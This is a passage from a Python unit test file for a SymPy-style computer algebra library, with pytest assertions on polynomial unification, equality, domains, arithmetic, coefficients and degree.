assert (x + 1).as_poly(domain=QQ).unify((x + 2).as_poly()) == \
((x + 1).as_poly(domain=QQ), (x + 2).as_poly(domain=QQ))
assert (x + 1).as_poly().unify((x + 2).as_poly(domain=QQ)) == \
((x + 1).as_poly(domain=QQ), (x + 2).as_poly(domain=QQ))
assert (x + 1).as_poly().unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(x, y, domain=ZZ), (x + 2).as_poly(x, y, domain=ZZ))
assert (x + 1).as_poly(domain=QQ).unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly().unify((x + 2).as_poly(x, y, domain=QQ)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly()) == \
((x + 1).as_poly(x, y, domain=ZZ), (x + 2).as_poly(x, y, domain=ZZ))
assert (x + 1).as_poly(x, y, domain=QQ).unify((x + 2).as_poly()) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly(domain=QQ)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(x, y, domain=ZZ), (x + 2).as_poly(x, y, domain=ZZ))
assert (x + 1).as_poly(x, y, domain=QQ).unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly(x, y, domain=QQ)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly().unify((x + 2).as_poly(y, x)) == \
((x + 1).as_poly(y, x, domain=ZZ), (x + 2).as_poly(y, x, domain=ZZ))
assert (x + 1).as_poly(domain=QQ).unify((x + 2).as_poly(y, x)) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (x + 1).as_poly().unify((x + 2).as_poly(y, x, domain=QQ)) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (x + 1).as_poly(y, x).unify((x + 2).as_poly()) == \
((x + 1).as_poly(y, x, domain=ZZ), (x + 2).as_poly(y, x, domain=ZZ))
assert (x + 1).as_poly(y, x, domain=QQ).unify((x + 2).as_poly()) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (x + 1).as_poly(y, x).unify((x + 2).as_poly(domain=QQ)) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly(y, x)) == \
((x + 1).as_poly(x, y, domain=ZZ), (x + 2).as_poly(x, y, domain=ZZ))
assert (x + 1).as_poly(x, y, domain=QQ).unify((x + 2).as_poly(y, x)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly(y, x, domain=QQ)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(y, x).unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(y, x, domain=ZZ), (x + 2).as_poly(y, x, domain=ZZ))
assert (x + 1).as_poly(y, x, domain=QQ).unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (x + 1).as_poly(y, x).unify((x + 2).as_poly(x, y, domain=QQ)) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (a*x).as_poly(x, domain=ZZ.inject(a)).unify((a*b*x).as_poly(x, domain=ZZ.inject(a, b).field)) == \
((a*x).as_poly(x, domain=ZZ.inject(a, b).field), (a*b*x).as_poly(x, domain=ZZ.inject(a, b).field))
assert (a*x).as_poly(x, domain=ZZ.inject(a).field).unify((a*b*x).as_poly(x, domain=ZZ.inject(a, b).field)) == \
((a*x).as_poly(x, domain=ZZ.inject(a, b).field), (a*b*x).as_poly(x, domain=ZZ.inject(a, b).field))
pytest.raises(CoercionFailed, lambda: Poly((x**2 + x**2*z).as_poly(y, field=True),
domain=ZZ.inject(x).field))
f = (t**2 + t/3 + x).as_poly(t, domain=QQ.inject(x).field)
g = (t**2 + t/3 + x).as_poly(t, domain=QQ.inject(x))
assert f.unify(g) == (f, f)
def test_Poly_free_symbols():
assert (x**2 + 1).as_poly().free_symbols == {x}
assert (x**2 + y*z).as_poly().free_symbols == {x, y, z}
assert (x**2 + y*z).as_poly(x).free_symbols == {x, y, z}
assert (x**2 + sin(y*z)).as_poly().free_symbols == {x, y, z}
assert (x**2 + sin(y*z)).as_poly(x).free_symbols == {x, y, z}
assert (x**2 + sin(y*z)).as_poly(x, domain=EX).free_symbols == {x, y, z}
def test_PurePoly_free_symbols():
assert PurePoly(x**2 + 1).free_symbols == set()
assert PurePoly(x**2 + y*z).free_symbols == set()
assert PurePoly(x**2 + y*z, x).free_symbols == {y, z}
assert PurePoly(x**2 + sin(y*z)).free_symbols == set()
assert PurePoly(x**2 + sin(y*z), x).free_symbols == {y, z}
assert PurePoly(x**2 + sin(y*z), x, domain=EX).free_symbols == {y, z}
def test_Poly__eq__():
assert (x.as_poly() == x.as_poly()) is True
assert (x.as_poly(domain=QQ) == x.as_poly()) is True
assert (x.as_poly() == x.as_poly(domain=QQ)) is True
assert (x.as_poly(domain=ZZ.inject(a)) == x.as_poly()) is True
assert (x.as_poly() == x.as_poly(domain=ZZ.inject(a))) is True
assert ((x*y).as_poly(x, y) == x.as_poly()) is False
assert (x.as_poly(x, y) == x.as_poly()) is False
assert (x.as_poly() == x.as_poly(x, y)) is False
assert ((x**2 + 1).as_poly() == (y**2 + 1).as_poly()) is False
assert ((y**2 + 1).as_poly() == (x**2 + 1).as_poly()) is False
f = x.as_poly(domain=ZZ)
g = x.as_poly(domain=QQ)
assert (f == g) is True
assert (f != g) is False
t0 = Symbol('t0')
f = ((t0/2 + x**2)*t**2 - x**2*t).as_poly(t, domain=QQ.inject(x, t0))
g = ((t0/2 + x**2)*t**2 - x**2*t).as_poly(t, domain=ZZ.inject(x, t0).field)
assert (f == g) is True
assert (x.as_poly() == y.as_poly()) is False
with pytest.raises(NotImplementedError):
assert x.as_poly(modulus=2) == x.as_poly(modulus=3)
def test_PurePoly__eq__():
assert (PurePoly(x, x) == PurePoly(x, x)) is True
assert (PurePoly(x, x, domain=QQ) == PurePoly(x, x)) is True
assert (PurePoly(x, x) == PurePoly(x, x, domain=QQ)) is True
assert (PurePoly(x, x, domain=ZZ.inject(a)) == PurePoly(x, x)) is True
assert (PurePoly(x, x) == PurePoly(x, x, domain=ZZ.inject(a))) is True
assert (PurePoly(x*y, x, y) == PurePoly(x, x)) is False
assert (PurePoly(x, x, y) == PurePoly(x, x)) is False
assert (PurePoly(x, x) == PurePoly(x, x, y)) is False
assert (PurePoly(x**2 + 1, x) == PurePoly(y**2 + 1, y)) is True
assert (PurePoly(y**2 + 1, y) == PurePoly(x**2 + 1, x)) is True
f = PurePoly(x, x, domain=ZZ)
g = PurePoly(x, x, domain=QQ)
assert (f == g) is True
assert (f != g) is False
f = PurePoly(x, x, domain=ZZ)
g = PurePoly(y, y, domain=QQ)
assert (f == g) is True
assert (f != g) is False
assert (f == 1) is False
assert (f == sin(x)) is False
with pytest.raises(NotImplementedError):
assert PurePoly(x, modulus=2) == PurePoly(x, modulus=3)
def test_PurePoly_Poly():
assert isinstance(PurePoly((x**2 + 1).as_poly()), PurePoly) is True
assert isinstance(PurePoly(x**2 + 1).as_poly(), Poly) is True
def test_Poly_domain():
assert (2*x).as_poly().domain == ZZ
assert (2*x).as_poly(domain=ZZ).domain == ZZ
assert (2*x).as_poly(domain=QQ).domain == QQ
assert (x/2).as_poly().domain == QQ
assert (x/2).as_poly(domain=ZZ) == Poly({(1, 1): 1}, x, Rational(1, 2),
domain=ZZ)
assert (x/2).as_poly(domain=QQ).domain == QQ
assert isinstance((0.2*x).as_poly().domain, RealField)
def test_Poly_set_domain():
assert (2*x + 1).as_poly().set_domain(ZZ) == (2*x + 1).as_poly()
assert (2*x + 1).as_poly().set_domain(QQ) == (2*x + 1).as_poly(domain=QQ)
assert (Rational(2, 10)*x + Rational(1, 10)).as_poly().set_domain(RR) == (0.2*x + 0.1).as_poly()
assert (0.2*x + 0.1).as_poly().set_domain(QQ) == (Rational(2, 10)*x + Rational(1, 10)).as_poly()
pytest.raises(CoercionFailed, lambda: (x/2 + 1).as_poly().set_domain(ZZ))
pytest.raises(CoercionFailed, lambda: (x + 1).as_poly(modulus=2).set_domain(QQ))
pytest.raises(GeneratorsError, lambda: (x*y).as_poly(x, y).set_domain(ZZ.inject(y)))
def test_Poly_get_modulus():
assert (x**2 + 1).as_poly(modulus=2).get_modulus() == 2
assert (x**2 + 1).as_poly(modulus=8).get_modulus() == 8
pytest.raises(PolynomialError, lambda: (x**2 + 1).as_poly().get_modulus())
def test_Poly_set_modulus():
assert (x**2 + 1).as_poly(modulus=2).set_modulus(7) == (x**2 + 1).as_poly(modulus=7)
assert (x**2 + 5).as_poly(modulus=7).set_modulus(2) == (x**2 + 1).as_poly(modulus=2)
assert (x**2 + 1).as_poly().set_modulus(2) == (x**2 + 1).as_poly(modulus=2)
assert (x**2 + 1).as_poly(modulus=2).set_modulus(4) == (x**2 + 1).as_poly(modulus=4)
assert (x**2 + 7*x + 6).as_poly(modulus=4) == (x**2 + 3*x + 2).as_poly(modulus=4)
pytest.raises(CoercionFailed, lambda: (x/2 + 1).as_poly().set_modulus(2))
def test_Poly_quo_ground():
assert (2*x + 4).as_poly().quo_ground(2) == (x + 2).as_poly()
assert (2*x + 3).as_poly().quo_ground(2) == (x + 1).as_poly()
def test_Poly_exquo_ground():
assert (2*x + 4).as_poly().exquo_ground(2) == (x + 2).as_poly()
pytest.raises(ExactQuotientFailed, lambda: (2*x + 3).as_poly().exquo_ground(2))
def test_Poly_abs():
assert abs((-x + 1).as_poly()) == (x + 1).as_poly()
def test_Poly_neg():
assert -(-x + 1).as_poly() == (x - 1).as_poly()
def test_Poly_add():
assert Integer(0).as_poly(x) + Integer(0).as_poly(x) == Integer(0).as_poly(x)
assert Integer(1).as_poly(x) + Integer(0).as_poly(x) == Integer(1).as_poly(x)
assert Integer(1).as_poly(x, y) + Integer(0).as_poly(x) == Integer(1).as_poly(x, y)
assert Integer(0).as_poly(x, y) + Integer(1).as_poly(x, y) == Integer(1).as_poly(x, y)
assert (x + 1).as_poly() + 2 == (x + 3).as_poly()
assert (x**2 + 1).as_poly() + (x - 2).as_poly() == (x**2 + x - 1).as_poly()
assert Integer(1).as_poly(x) + x == (x + 1).as_poly()
assert Integer(1).as_poly(x) + sin(x) == 1 + sin(x)
assert sin(x) + Integer(1).as_poly(x) == sin(x) + 1
assert x.as_poly() + 1 == (x + 1).as_poly()
assert 1 + x.as_poly() == (x + 1).as_poly()
def test_Poly_sub():
assert Integer(0).as_poly(x) - Integer(0).as_poly(x) == Integer(0).as_poly(x)
assert Integer(1).as_poly(x) - Integer(0).as_poly(x) == Integer(1).as_poly(x)
assert Integer(1).as_poly(x) - 1 == Integer(0).as_poly(x)
assert Integer(1).as_poly(x, y) - Integer(0).as_poly(x) == Integer(1).as_poly(x, y)
assert Integer(0).as_poly(x) - Integer(1).as_poly(x, y) == Integer(-1).as_poly(x, y)
assert Integer(0).as_poly(x, y) - Integer(1).as_poly(x, y) == Integer(-1).as_poly(x, y)
assert Integer(1).as_poly(x) - x == (1 - x).as_poly()
assert Integer(1).as_poly(x) - sin(x) == 1 - sin(x)
assert sin(x) - Integer(1).as_poly(x) == sin(x) - 1
assert x.as_poly() - 1 == (x - 1).as_poly()
assert 1 - x.as_poly() == (1 - x).as_poly()
assert (x + 1).as_poly() - 2 == (x - 1).as_poly()
assert (x**2 + 1).as_poly() - (x - 2).as_poly() == (x**2 - x + 3).as_poly()
def test_Poly_mul():
assert Integer(0).as_poly(x) * Integer(0).as_poly(x) == Integer(0).as_poly(x)
assert Integer(2).as_poly(x) * Integer(4).as_poly(x) == Integer(8).as_poly(x)
assert Integer(2).as_poly(x, y) * Integer(4).as_poly(x) == Integer(8).as_poly(x, y)
assert Integer(4).as_poly(x) * Integer(2).as_poly(x, y) == Integer(8).as_poly(x, y)
assert Integer(4).as_poly(x, y) * Integer(2).as_poly(x, y) == Integer(8).as_poly(x, y)
assert Integer(1).as_poly(x) * x == x.as_poly()
assert Integer(1).as_poly(x) * sin(x) == sin(x)
assert sin(x) * Integer(1).as_poly(x) == sin(x)
assert x.as_poly() * 2 == (2*x).as_poly()
assert 2 * x.as_poly() == (2*x).as_poly()
assert (x + 1).as_poly() * 2 == (2*x + 2).as_poly()
assert (x**2 + 1).as_poly() * (x - 2).as_poly() == (x**3 - 2*x**2 + x - 2).as_poly()
def test_Poly_pow():
assert x.as_poly()**10 == (x**10).as_poly()
assert (2*y).as_poly(x, y)**4 == (16*y**4).as_poly(x, y)
assert (7*x*y).as_poly(x, y)**3 == (343*x**3*y**3).as_poly(x, y)
assert (x*y + 1).as_poly(x, y)**(-1) == (x*y + 1)**(-1)
assert (x*y + 1).as_poly(x, y)**x == (x*y + 1)**x
assert (x - 2).as_poly()**3 == (x**3 - 6*x**2 + 12*x - 8).as_poly()
assert (x*y).as_poly(x, y)**2 == (x**2*y**2).as_poly(x, y)
assert (x - 2).as_poly()**2 == (x**2 - 4*x + 4).as_poly()
f, g = (x**3 + x - 1).as_poly(), (x**3 + 1).as_poly()
r = pow(f, 3, g)
assert r == f**3 % g
assert r == (-6*x**2 + 12*x - 9).as_poly()
def test_Poly_divmod():
f, g = (x**2).as_poly(), x.as_poly()
q, r = g, Integer(0).as_poly(x)
assert divmod(f, g) == (q, r)
assert f // g == q
assert f % g == r
assert divmod(f, x) == (q, r)
assert f // x == q
assert f % x == r
q, r = Integer(0).as_poly(x), Integer(2).as_poly(x)
assert divmod(2, g) == (q, r)
assert 2 // g == q
assert 2 % g == r
assert x.as_poly()/x.as_poly() == 1
assert (x**2).as_poly()/x.as_poly() == x
assert x.as_poly()/(x**2).as_poly() == 1/x
def test_Poly_eq_ne():
assert ((x + y).as_poly(x, y) == (x + y).as_poly(x, y)) is True
assert ((x + y).as_poly(x) == (x + y).as_poly(x, y)) is False
assert ((x + y).as_poly(x, y) == (x + y).as_poly(x)) is False
assert ((x + y).as_poly(x) == (x + y).as_poly(x)) is True
assert ((x + y).as_poly(y) == (x + y).as_poly(y)) is True
assert ((x + y).as_poly(x, y) == x + y) is True
assert ((x + y).as_poly(x) == x + y) is True
assert ((x + y).as_poly(x, y) == x + y) is True
assert ((x + y).as_poly(x) == x + y) is True
assert ((x + y).as_poly(y) == x + y) is True
assert ((x + y).as_poly(x, y) != (x + y).as_poly(x, y)) is False
assert ((x + y).as_poly(x) != (x + y).as_poly(x, y)) is True
assert ((x + y).as_poly(x, y) != (x + y).as_poly(x)) is True
assert ((x + y).as_poly(x) != (x + y).as_poly(x)) is False
assert ((x + y).as_poly(y) != (x + y).as_poly(y)) is False
assert ((x + y).as_poly(x, y) != x + y) is False
assert ((x + y).as_poly(x) != x + y) is False
assert ((x + y).as_poly(x, y) != x + y) is False
assert ((x + y).as_poly(x) != x + y) is False
assert ((x + y).as_poly(y) != x + y) is False
assert (x.as_poly() == sin(x)) is False
assert (x.as_poly() != sin(x)) is True
def test_Poly_nonzero():
assert not bool(Integer(0).as_poly(x)) is True
assert not bool(Integer(1).as_poly(x)) is False
def test_Poly_properties():
assert Integer(0).as_poly(x).is_zero is True
assert Integer(1).as_poly(x).is_zero is False
assert Integer(1).as_poly(x).is_one is True
assert Integer(2).as_poly(x).is_one is False
assert (x - 1).as_poly().is_squarefree is True
assert ((x - 1)**2).as_poly().is_squarefree is False
assert Integer(1).as_poly(x).is_ground is True
assert x.as_poly().is_ground is False
assert (x + y + z + 1).as_poly().is_linear is True
assert (x*y*z + 1).as_poly().is_linear is False
assert (x*y + z + 1).as_poly().is_quadratic is True
assert (x*y*z + 1).as_poly().is_quadratic is False
assert (x*y).as_poly().is_term is True
assert (x*y + 1).as_poly().is_term is False
assert (x**2 + x*y).as_poly().is_homogeneous is True
assert (x**3 + x*y).as_poly().is_homogeneous is False
assert x.as_poly().is_univariate is True
assert (x*y).as_poly().is_univariate is False
assert (x*y).as_poly().is_multivariate is True
assert x.as_poly().is_multivariate is False
assert (x**16 + x**14 - x**10 + x**8 - x**6 +
x**2 + 1).as_poly().is_cyclotomic is False
assert (x**16 + x**14 - x**10 - x**8 - x**6 +
x**2 + 1).as_poly().is_cyclotomic is True
def test_Poly_is_irreducible():
assert (x**2 + x + 1).as_poly().is_irreducible is True
assert (x**2 + 2*x + 1).as_poly().is_irreducible is False
assert (7*x + 3).as_poly(modulus=11).is_irreducible is True
assert (7*x**2 + 3*x + 1).as_poly(modulus=11).is_irreducible is False
def test_Poly_subs():
assert (x + 1).as_poly().subs({x: 0}) == 1
assert (x + 1).as_poly().subs({x: x}) == (x + 1).as_poly()
assert (x + 1).as_poly().subs({x: y}) == (y + 1).as_poly()
assert (x*y).as_poly(x).subs({y: x}) == x**2
assert (x*y).as_poly(x).subs({x: y}) == y**2
def test_Poly_replace():
assert (x + 1).as_poly().replace(x) == (x + 1).as_poly()
assert (x + 1).as_poly().replace(y) == (y + 1).as_poly()
pytest.raises(PolynomialError, lambda: (x + y).as_poly().replace(z))
assert (x + 1).as_poly().replace(x, x) == (x + 1).as_poly()
assert (x + 1).as_poly().replace(x, y) == (y + 1).as_poly()
assert (x + y).as_poly().replace(x, x) == (x + y).as_poly()
assert (x + y).as_poly().replace(x, z) == (z + y).as_poly(z, y)
assert (x + y).as_poly().replace(y, y) == (x + y).as_poly()
assert (x + y).as_poly().replace(y, z) == (x + z).as_poly(x, z)
pytest.raises(PolynomialError, lambda: (x + y).as_poly().replace(x, y))
pytest.raises(PolynomialError, lambda: (x + y).as_poly().replace(z, t))
assert (x + y).as_poly(x).replace(x, z) == (z + y).as_poly(z)
assert (x + y).as_poly(y).replace(y, z) == (x + z).as_poly(z)
pytest.raises(PolynomialError, lambda: (x + y).as_poly(x).replace(x, y))
pytest.raises(PolynomialError, lambda: (x + y).as_poly(y).replace(y, x))
def test_Poly_reorder():
pytest.raises(PolynomialError, lambda: (x + y).as_poly().reorder(x, z))
assert (x + y).as_poly().reorder(x, y) == (x + y).as_poly(x, y)
assert (x + y).as_poly().reorder(y, x) == (x + y).as_poly(y, x)
assert (x + y).as_poly(y, x).reorder(x, y) == (x + y).as_poly()
assert (x + y).as_poly(y, x).reorder(y, x) == (x + y).as_poly(y, x)
assert (x + y).as_poly().reorder(wrt=x) == (x + y).as_poly()
assert (x + y).as_poly(x, y).reorder(wrt=y) == (x + y).as_poly(y, x)
def test_Poly_has_only_gens():
assert (x*y + 1).as_poly(x, y, z).has_only_gens(x, y) is True
assert (x*y + z).as_poly(x, y, z).has_only_gens(x, y) is False
pytest.raises(GeneratorsError, lambda: (x*y**2 + y**2).as_poly(x, y).has_only_gens(t))
def test_Poly_to_ring():
assert (2*x + 1).as_poly(domain=ZZ).to_ring() == (2*x + 1).as_poly(domain=ZZ)
assert (2*x + 1).as_poly(domain=QQ).to_ring() == (2*x + 1).as_poly(domain=ZZ)
pytest.raises(CoercionFailed, lambda: (x/2 + 1).as_poly().to_ring())
pytest.raises(AttributeError, lambda: (2*x + 1).as_poly(modulus=3).to_ring())
def test_Poly_to_field():
assert (2*x + 1).as_poly(domain=ZZ).to_field() == (2*x + 1).as_poly(domain=QQ)
assert (2*x + 1).as_poly(domain=QQ).to_field() == (2*x + 1).as_poly(domain=QQ)
assert (x/2 + 1).as_poly(domain=QQ).to_field() == (x/2 + 1).as_poly(domain=QQ)
assert (2*x + 1).as_poly(modulus=3).to_field() == (2*x + 1).as_poly(modulus=3)
assert (2.0*x + 1.0).as_poly().to_field() == (2.0*x + 1.0).as_poly()
def test_Poly_to_exact():
assert (2*x).as_poly().to_exact() == (2*x).as_poly()
assert (x/2).as_poly().to_exact() == (x/2).as_poly()
assert (0.1*x).as_poly().to_exact() == (x/10).as_poly()
def test_Poly_retract():
f = (x**2 + 1).as_poly(domain=QQ.inject(y))
assert f.retract() == (x**2 + 1).as_poly(domain=ZZ)
assert f.retract(field=True) == (x**2 + 1).as_poly(domain=QQ)
assert Integer(0).as_poly(x, y).retract() == Integer(0).as_poly(x, y)
def test_Poly_slice():
f = (x**3 + 2*x**2 + 3*x + 4).as_poly()
assert f.slice(0, 0) == Integer(0).as_poly(x)
assert f.slice(0, 1) == Integer(4).as_poly(x)
assert f.slice(0, 2) == (3*x + 4).as_poly()
assert f.slice(0, 3) == (2*x**2 + 3*x + 4).as_poly()
assert f.slice(0, 4) == (x**3 + 2*x**2 + 3*x + 4).as_poly()
assert f.slice(x, 0, 0) == Integer(0).as_poly(x)
assert f.slice(x, 0, 1) == Integer(4).as_poly(x)
assert f.slice(x, 0, 2) == (3*x + 4).as_poly()
assert f.slice(x, 0, 3) == (2*x**2 + 3*x + 4).as_poly()
assert f.slice(x, 0, 4) == (x**3 + 2*x**2 + 3*x + 4).as_poly()
def test_Poly_coeffs():
assert Integer(0).as_poly(x).coeffs() == []
assert Integer(1).as_poly(x).coeffs() == [1]
assert (2*x + 1).as_poly().coeffs() == [2, 1]
assert (7*x**2 + 2*x + 1).as_poly().coeffs() == [7, 2, 1]
assert (7*x**4 + 2*x + 1).as_poly().coeffs() == [7, 2, 1]
assert (x*y**7 + 2*x**2*y**3).as_poly().coeffs('lex') == [2, 1]
assert (x*y**7 + 2*x**2*y**3).as_poly().coeffs('grlex') == [1, 2]
def test_Poly_monoms():
assert Integer(0).as_poly(x).monoms() == []
assert Integer(1).as_poly(x).monoms() == [(0,)]
assert (2*x + 1).as_poly().monoms() == [(1,), (0,)]
assert (7*x**2 + 2*x + 1).as_poly().monoms() == [(2,), (1,), (0,)]
assert (7*x**4 + 2*x + 1).as_poly().monoms() == [(4,), (1,), (0,)]
assert (x*y**7 + 2*x**2*y**3).as_poly().monoms('lex') == [(2, 3), (1, 7)]
assert (x*y**7 + 2*x**2*y**3).as_poly().monoms('grlex') == [(1, 7), (2, 3)]
def test_Poly_terms():
assert Integer(0).as_poly(x).terms() == []
assert Integer(1).as_poly(x).terms() == [((0,), 1)]
assert (2*x + 1).as_poly().terms() == [((1,), 2), ((0,), 1)]
assert (7*x**2 + 2*x + 1).as_poly().terms() == [((2,), 7), ((1,), 2), ((0,), 1)]
assert (x*y**7 + 2*x**2*y**3).as_poly().terms('lex') == [((2, 3), 2), ((1, 7), 1)]
assert (x*y**7 + 2*x**2*y**3).as_poly().terms('grlex') == [((1, 7), 1), ((2, 3), 2)]
def test_Poly_all_coeffs():
assert Integer(0).as_poly(x).all_coeffs() == [0]
assert Integer(1).as_poly(x).all_coeffs() == [1]
assert (2*x + 1).as_poly().all_coeffs() == [1, 2]
assert (7*x**2 + 2*x + 1).as_poly().all_coeffs() == [1, 2, 7]
assert (7*x**4 + 2*x + 1).as_poly().all_coeffs() == [1, 2, 0, 0, 7]
def test_Poly_termwise():
f = (x**2 + 20*x + 400).as_poly()
g = (x**2 + 2*x + 4).as_poly()
def func(monom, coeff):
k, = monom
return coeff//10**(2 - k)
assert f.termwise(func) == g
def func2(monom, coeff):
k, = monom
return (k,), coeff//10**(2 - k)
assert f.termwise(func2) == g
def func3(monom, coeff):
k, = monom
return (k,), coeff // 2
assert f.termwise(func3) == (10*x + 200).as_poly()
def func4(monom, coeff):
k, = monom
return k % 2, coeff
pytest.raises(PolynomialError, lambda: f.termwise(func4))
def test_Poly_length():
assert Integer(0).as_poly(x).length() == 0
assert Integer(1).as_poly(x).length() == 1
assert x.as_poly().length() == 1
assert (x + 1).as_poly().length() == 2
assert (x**2 + 1).as_poly().length() == 2
assert (x**2 + x + 1).as_poly().length() == 3
def test_Poly_as_dict():
assert Integer(0).as_poly(x).as_dict() == {}
assert Integer(0).as_poly(x, y, z).as_dict() == {}
assert Integer(1).as_poly(x).as_dict() == {(0,): 1}
assert Integer(1).as_poly(x, y, z).as_dict() == {(0, 0, 0): 1}
assert (x**2 + 3).as_poly().as_dict() == {(2,): 1, (0,): 3}
assert (x**2 + 3).as_poly().as_dict(native=True) == {(2,): ZZ(1), (0,): ZZ(3)}
assert (x**2 + 3).as_poly(x, y, z).as_dict() == {(2, 0, 0): 1, (0, 0, 0): 3}
assert (3*x**2*y*z**3 + 4*x*y +
5*x*z).as_poly().as_dict() == {(2, 1, 3): 3, (1, 1, 0): 4,
(1, 0, 1): 5}
def test_Poly_as_expr():
assert Integer(0).as_poly(x).as_expr() == 0
assert Integer(0).as_poly(x, y, z).as_expr() == 0
assert Integer(1).as_poly(x).as_expr() == 1
assert Integer(1).as_poly(x, y, z).as_expr() == 1
assert (x**2 + 3).as_poly().as_expr() == x**2 + 3
assert (x**2 + 3).as_poly(x, y, z).as_expr() == x**2 + 3
assert (3*x**2*y*z**3 + 4*x*y +
5*x*z).as_poly().as_expr() == 3*x**2*y*z**3 + 4*x*y + 5*x*z
f = (x**2 + 2*x*y**2 - y).as_poly()
assert f.as_expr() == -y + x**2 + 2*x*y**2
assert f.as_expr({x: 5}) == 25 - y + 10*y**2
assert f.as_expr({y: 6}) == -6 + 72*x + x**2
assert f.as_expr({x: 5, y: 6}) == 379
assert f.as_expr(5, 6) == 379
pytest.raises(GeneratorsError, lambda: f.as_expr({z: 7}))
def test_Poly_inject():
f = (x**2*y + x*y**3 + x*y + 1).as_poly(x)
assert f.inject() == (x**2*y + x*y**3 + x*y + 1).as_poly()
assert f.inject(front=True) == (y**3*x + y*x**2 + y*x + 1).as_poly(y, x)
f = (x**2 + 2*x - 1).as_poly()
assert f.inject() == f
f = (x**2 - 2*sqrt(3)*x + 4).as_poly(extension=True)
assert f.inject().replace(f.domain.ext, y) == (x**2 - 2*x*y + 4).as_poly()
def test_Poly_eject():
f = (x**2*y + x*y**3 + x*y + 1).as_poly()
assert f.eject(x) == (x*y**3 + (x**2 + x)*y + 1).as_poly(y, domain=ZZ.inject(x))
assert f.eject(y) == (y*x**2 + (y**3 + y)*x + 1).as_poly(x, domain=ZZ.inject(y))
ex = x + y + z + t + w
g = ex.as_poly()
assert g.eject(x) == ex.as_poly(y, z, t, w, domain=ZZ.inject(x))
assert g.eject(x, y) == ex.as_poly(z, t, w, domain=ZZ.inject(x, y))
assert g.eject(x, y, z) == ex.as_poly(t, w, domain=ZZ.inject(x, y, z))
assert g.eject(w) == ex.as_poly(x, y, z, t, domain=ZZ.inject(w))
assert g.eject(t, w) == ex.as_poly(x, y, z, domain=ZZ.inject(w, t))
assert g.eject(z, t, w) == ex.as_poly(x, y, domain=ZZ.inject(w, t, z))
pytest.raises(DomainError, lambda: x*y.as_poly(x, y, domain=ZZ.inject(z)).eject(y))
assert (x*y).as_poly(x, y, z).eject(y) == (x*y).as_poly(x, z, domain=ZZ.inject(y))
def test_Poly_exclude():
assert x.as_poly(x, y).exclude() == x.as_poly()
assert (x*y).as_poly(x, y).exclude() == (x*y).as_poly(x, y)
assert Integer(1).as_poly(x, y).exclude() == Integer(1).as_poly(x, y)
assert (y**2 + y*z**2).as_poly(x, y, z).exclude() == (y**2 + y*z**2).as_poly(y, z)
def test_Poly__gen_to_level():
f = Integer(1).as_poly(x, y)
assert f._gen_to_level(-2) == 0
assert f._gen_to_level(-1) == 1
assert f._gen_to_level(+0) == 0
assert f._gen_to_level(+1) == 1
pytest.raises(PolynomialError, lambda: f._gen_to_level(-3))
pytest.raises(PolynomialError, lambda: f._gen_to_level(+2))
assert f._gen_to_level(x) == 0
assert f._gen_to_level(y) == 1
assert f._gen_to_level('x') == 0
assert f._gen_to_level('y') == 1
pytest.raises(PolynomialError, lambda: f._gen_to_level(z))
pytest.raises(PolynomialError, lambda: f._gen_to_level('z'))
def test_Poly_degree():
assert Integer(0).as_poly(x).degree() == -math.inf
assert Integer(1).as_poly(x).degree() == 0
assert x.as_poly().degree() == 1
assert Integer(0).as_poly(x).degree(gen=0) == -math.inf
assert Integer(1).as_poly(x).degree(gen=0) == 0
assert x.as_poly().degree(gen=0) == 1
assert Integer(0).as_poly(x).degree(gen=x) == -math.inf
assert Integer(1).as_poly(x).degree(gen=x) == 0
assert x.as_poly().degree(gen=x) == 1
assert Integer(0).as_poly(x).degree(gen='x') == -math.inf
assert Integer(1).as_poly(x).degree(gen='x') == 0
assert x.as_poly().degree(gen='x') == 1
f = Integer(1).as_poly(x)
pytest.raises(PolynomialError, lambda: f.degree(gen=1))
pytest.raises(PolynomialError, lambda: f.degree(gen=y))
pytest.raises(PolynomialError, lambda: f.degree(gen='y'))
assert Integer(1).as_poly(x, y).degree() == 0
assert (2*y).as_poly(x, y).degree() == 0
assert (x*y).as_poly(x, y).degree() == 1
assert Integer(1).as_poly(x, y).degree(gen=x) == 0
assert (2*y).as_poly(x, y).degree(gen=x) == 0
assert (x*y).as_poly(x, y).degree(gen=x) == 1
assert Integer(1).as_poly(x, y).degree(gen=y) == 0
assert (2*y).as_poly(x, y).degree(gen=y) == 1
assert (x*y).as_poly(x, y).degree(gen=y) == 1
assert degree(1, x) == 0
assert degree(x, x) == 1
assert degree(x*y**2, gen=x) == 1
assert degree(x*y**2, gen=y) == 2
assert degree(x*y**2, x, y) == 1
assert degree(x*y**2, y, x) == 2
pytest.raises(ComputationFailed, lambda: degree(1))
# issue sympy/sympy#20389
